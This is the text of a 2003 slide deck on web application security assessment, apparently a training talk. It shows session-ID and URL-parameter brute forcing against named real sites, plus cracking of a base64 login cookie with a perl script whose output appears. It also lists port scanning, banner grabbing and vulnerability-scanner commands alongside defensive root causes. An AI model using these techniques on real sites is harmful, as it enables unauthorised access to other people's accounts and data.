http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
http://online.securityfocus.com/archive/1/211520
–
https://www.app.airtouch.com/jstage/plsql/e
c_navigation_wrapper.nav_frame_display?p_se
ssion_id=3346178&p_host=ACTION
SECURITY INNOVATION ©2003
URL Example: Brute Forcing Register.com
Thank you for using register.com's Domain Manager.
To change or re-enter your password, please copy and paste the URL below
into the "Location" or "Address" field of your web browser and hit the
'Enter' key on your keyboard.
Note: If your e-mail program supports HTML, you may be able to click on
the link below.
http://mydomain.register.com/change_password.cgi?155218782787
Note: Above link will be expire within three days
SECURITY INNOVATION ©2003
Example 2: Brute Forcing Web Session ID’s
http://mydomain.register.com/change_password.cgi?486218782865
http://mydomain.register.com/change_password.cgi?440218782891
http://mydomain.register.com/change_password.cgi?685218782917
http://mydomain.register.com/change_password.cgi?505218782956
http://mydomain.register.com/change_password.cgi?435218782969
http://mydomain.register.com/change_password.cgi?486218782865
http://mydomain.register.com/change_password.cgi?440218782891
http://mydomain.register.com/change_password.cgi?685218782917
http://mydomain.register.com/change_password.cgi?505218782956
http://mydomain.register.com/change_password.cgi?435218782969
SECURITY INNOVATION ©2003
URL Example – Brute Forcing Dfilm.com
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Monday, July 01, 2002 1:38 PM
To: [email protected]
Subject: D.FILM Digital Movie for Dave
Dave created a digital movie for you!
You can view it at the following URL:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
Cheers,
Dave and DFILM.
Be sure to check out the web site at
http://www.dfilm.com
SECURITY INNOVATION ©2003
URL Example – Brute Forcing Dfilm.com
No privacy of other user’s creations:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
http://mm.dfilm.com/mm2s/mm_route.php?id=110531
http://mm.dfilm.com/mm2s/mm_route.php?id=110530
http://mm.dfilm.com/mm2s/mm_route.php?id=110529
http://mm.dfilm.com/mm2s/mm_route.php?id=110528
http://mm.dfilm.com/mm2s/mm_route.php?id=110527
http://mm.dfilm.com/mm2s/mm_route.php?id=110526
http://mm.dfilm.com/mm2s/mm_route.php?id=…
SECURITY INNOVATION ©2003
URL Example – Sendomatic.com
http://www.sendomatic.com/servlets/servlets
/mysendo?uId=76330
SECURITY INNOVATION ©2003
URL Example – Sendomatic.com
View other people’s events. Crash a party, edit an event,
cancel and event, etc.
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336
http://www.sendomatic.com/servlets/servlets/mysendo?uId=…
SECURITY INNOVATION ©2003
Cookie Example – Freeservers.com
SECURITY INNOVATION ©2003
Cookie Example – Freeservers.com
•LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbTo
xMjMxMjM0;
• Base 64 decode the string:
http://www.securitystats.com/tools/base64.asp
testing123.itgo.com:1231234
username:password
• Next, automate it with a perl exploit by feeding
encoded strings in to the cookie
SECURITY INNOVATION ©2003
Cookie Example – Freeservers.com
%perl freeservershack.pl
trying test
trying test123
trying 123123
trying 1231234
Cracked it! The password to testing123.itgo.com is
1231234
GET http://testing123.itgo.com/cgibin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)
Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D
Cookie2: $Version=1
%
SECURITY INNOVATION ©2003
Cookie Example – Freeservers.com
• Or a much longer way: use the brute forcer on
every single cookie character combination
SECURITY INNOVATION ©2003
Cookie/URL Example – Amazon.com
• Some sites use the URL AND Cookie for
authentication:
SECURITY INNOVATION ©2003
6 Common Problems
•
•
•
Weak Algorithm – Many of the most popular web sites
today are currently using linear algorithms based on
easily predictable variables such as time or IP address.
No Form of Account Lockout – With regard to Session
ID brute force attacks, an attacker can probably try
hundreds or thousands of Session IDs embedded in a
legitimate URL without a single complaint from the
web server.
Short Key Space – Even the most cryptographically
strong algorithm still allows an active Session ID to be
easily determined if the size of the string’s key space is
not sufficiently large.
SECURITY INNOVATION ©2003
6 Common Problems – Continued
•
•
•
Indefinite Expiration on Server– Session IDs that do not
expire on the web server can allow an attacker
unlimited time to guess a valid Session ID.
Transmitted in the Clear – Assuming SSL is not being
used while the Session ID cookie is transmitted to and
from the browser, the Session ID could be sniffed
across a flat network taking the guess-work away for a
miscreant. This is still a problem with proxy servers.
Insecure Retrieval – By tricking the user’s browser into
visiting another site, an attacker can retrieve stored
Session ID information and quickly exploit this
information before the user’s sessions expire. This can
be done a number of ways: DNS poisoning, Cross-site
Scripting, etc.
SECURITY INNOVATION ©2003
Tools
•
Sessions Auditor
•
Visual Testing – WebSleuth
•
•
•
WebProxy -www.atstake.com/research/tools/index.html
HTTPush - httpush.sourceforge.net
Achilles - www.digizen-security.com/downloads.html
•
MiniBrowser -
www.idefense.com/idtools/Session_Auditor.zip
www.geocities.com/dzzie/sleuth
aignes.com/download.htm
SECURITY INNOVATION ©2003
Why Automated Tools Don’t
Work Very Well
• Some good things:
– Completeness
– Large knowledge bases (at least possibly)
• Puts Web security assessment into the hands
of anyone who calls themselves a
“Information Security Expert”.
SECURITY INNOVATION ©2003
Why Automated Tools Don’t
Work Very Well
•Every programmer does things a little different
•Authentication schemes are hard to automate
•Error codes are not standardized
•Sometimes simple things like SSL get in the way
SECURITY INNOVATION ©2003
Why People are Better
•Recognition of subtle errors
•We understand the impact and therefore the
risk of a vulnerability
•We are grounded in the fundamentals of
Computer Science and therefore are able to
find “real” bugs, flaws in logic
SECURITY INNOVATION ©2003
Web Hacking Accessories
• Some helpful tools include….
– A port scanner (Nmap et. al.) www.insecure.org/nmap/
– Netcat; the network swiss army knife
http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner; Whisker
http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– Open SSL source and documentation
• OpenSSL, RFC 2246
SECURITY INNOVATION ©2003
New tools on the horizon…
• Nikto
–
CGI scanner, similar to whisker 1.4. Checks for CGIs, common dirs,
and old versions Database frequently updated http://www.cirt.net/
• WHArsenal
–
Set of CGIs that plug into an existing Apache install. Allows for all
kinds of requests, while controling/modifying request particulars.
http://community.whitehatsec.com/
• @stake WebProxy
–
Assessment proxy with full fuzzer/rewriting capabilities.
Implemented in Java; supports Linux, Solaris, and Windows.
http://www.atstake.com/
• Nessus
–
Has a few new interesting web assessment plugins which do site
crawling/mirroring and a few other interesting things.
http://www.nessus.org/
SECURITY INNOVATION ©2003
Basic Training for Web
Combat…
• Port scanning
– Look for well-known TCP web ports.
• 80, 81, 443, 8000, 8080, etc…
• Using FScan (from Foundstone)
fscan -p 80,81,443,8000,8080 10.0.0.1
• Using nmap (by Fyodor)
nmap -p 80,81,443,8000,8080 10.0.0.1
SECURITY INNOVATION ©2003
Basic Training for Web Combat…
• Fingerprinting
– HTTP Banner grabbing.
– netcat as a TCP client (even telnet works)
nc 10.0.0.1 80
HEAD / HTTP/1.0
• Advanced HTTP methods:
– TRACE, OPTIONS, etc.
SECURITY INNOVATION ©2003
Basic Training for Web Combat…
Shaking the tree for the low hanging
fruit….
• Scan using a database of known web
vulnerabilities.
• Whisker (by Rain Forest Puppy)
./whisker.pl -h 10.0.0.1 -I 1
• cgichk.c
<snip>
"GET /cgi-bin/phf HTTP/1.0\n\n";
"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
"GET /cgi-bin/test-cgi HTTP/1.0\n\n";
"GET /cgi-bin/php.cgi HTTP/1.0\n\n
• ISS, Cybercop, Retina, etc.
SECURITY INNOVATION ©2003
el33t hax0r Training for Web
Combat…
What about SSL?
• Some SSL Myths:
– “We are secure because we use SSL!”
– “Strong 128 bit crypto being used”
– “We use Digital Certificates signed by VeriSign”
SECURITY INNOVATION ©2003
Proxy Over SSL
• Using netcat and OpenSSL, it is possible to
create a simple two-line SSL Proxy!
• Listen on port 80 on a host and redirect
requests to port 443 on a remote host through
SSL.
Web
client
nc
openssl
SECURITY INNOVATION ©2003
SSL
web
server
Assessment Tools
• Vulnerability scanners
– Look for a known list of vulnerable applications or
technologies
– Do not (can not) engage/scan custom applications
and configurations
– General vulnerability scanners: ISS, Cybercop,
Nessus
– Web-specific vulnerability scanners:
WebInspect, whisker
SECURITY INNOVATION ©2003
Assessment tools
• ‘Proxy monitors’
– HTTP proxy which monitors traffic, looking for
web vulnerabilities as they pass
– Can analyze custom applications with the help of a
user
– Examples: AppScan, RFProxy,
HTTPush, Achilles
SECURITY INNOVATION ©2003
Root Causes of Web Hacks
• Complex web architectures may cause
oversight in web server configuration.
• URL Parsing.
• File Canonicalization.
• Combination of underlying operating system
and web server may leave holes.
SECURITY INNOVATION ©2003
Root Causes of Web Hacks
• Untested code used in web applications, to
save time.
• Level of security consciousness low in web
application developers.
• Security vs. convenience.
• Security vs. time-to-market.
• Zero knowledge administration breeds zero
knowledge administrators.
SECURITY INNOVATION ©2003
Descargar

Assessment of Web Security